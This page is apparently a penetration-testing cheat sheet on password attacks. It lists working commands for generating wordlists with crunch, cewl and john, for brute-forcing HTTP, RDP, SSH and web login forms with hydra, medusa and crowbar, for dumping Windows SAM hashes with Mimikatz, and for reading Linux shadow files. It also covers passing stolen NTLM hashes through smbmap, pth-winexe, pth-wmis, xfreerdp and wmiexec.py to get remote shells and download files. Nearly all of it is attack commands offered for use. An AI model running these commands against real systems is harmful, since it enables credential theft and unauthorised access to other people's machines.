Skip to content

Password Attacks

Generate Wordlists

  • /usr/share/wordlists

  • /usr/share/seclists

crunch

crunch 5 5 -t ,@@^% -o password.txt
crunch 10 10 0123456789 -t 2343@@@@@@ -o passwd.txt

Using /usr/share/crunch/charset.lst

crunch 4 4 -f /usr/share/crunch/charset.lst lalpha -o crunch.txt
Placeholder Character Translation
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including space

cewl

cewl $url -m 6 -w wordlists.txt

john.conf Rules

/etc/john/john.conf > [List.Rules:Wordlist]

john --wordlist=passwd.txt --rules --stdout > pass-rules.txt

Common Services

HTTP htaccess Attack

How To Set Up Password Authentication with Apache on Ubuntu 14.04

medusa -h 127.0.0.1 -u kali -P ./pass.txt -M http -m DIR:/

RDP Attack

crowbar -b rdp -s 192.168.11.135/32 -u windows_10_1903_x64 -C ./pass.txt -n 4

SSH Attack

hydra -l kali -P ./pass.txt ssh://127.0.0.1

HTTP POST Attack

hydra -l admin -P ./pass.txt 192.168.11.135 http-form-post "/admin.php:user=admin&pass=^PASS^:INVALID CREDENTIALS" -vV -f

Leveraging Password Hashes

Retrieving Password Hashes

How to identify hash types

Generate password for new user

openssl passwd -1 -salt hades leecybersec > hash.txt
hashid -m hash.txt
john --wordlist=./pass.txt hash.txt

Passing the Hash in Windows

Intro to Windows hashes

Mimikatz.exe

privilege::debug
token::elevate
lsadump::sam

Pass-The-Hash

Using smbmap

List directory at folder Desktop

smbmap -H 192.168.11.135 -u windows_10_1903_x64 -p 'aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e' -r 'Users\windows_10_1903_x64\Desktop'

Download file 41542.c in Windows 10

smbmap -H 192.168.11.135 -u windows_10_1903_x64 -p 'aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e' --download 'Users\windows_10_1903_x64\Desktop\41542.c'

pth-winexe

pth-winexe -U windows_10_1903_x64%aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e //192.168.11.135 cmd

pth-wmis

pth-wmis -U windows_10_1903_x64%aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e //192.168.11.135 cmd

xfreerdp

xfreerdp /v:192.168.11.135 /u:windows_10_1903_x64 /pth:68bdacb06923faed9dc32661308f594e

wmiexec.py

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e windows_10_1903_x64@192.168.11.135

Password Cracking

john --wordlist=./pass.txt hash.txt
unshadow passwd shadow > hash
john --rules --wordlist=./pass.txt hash

https://hashcat.net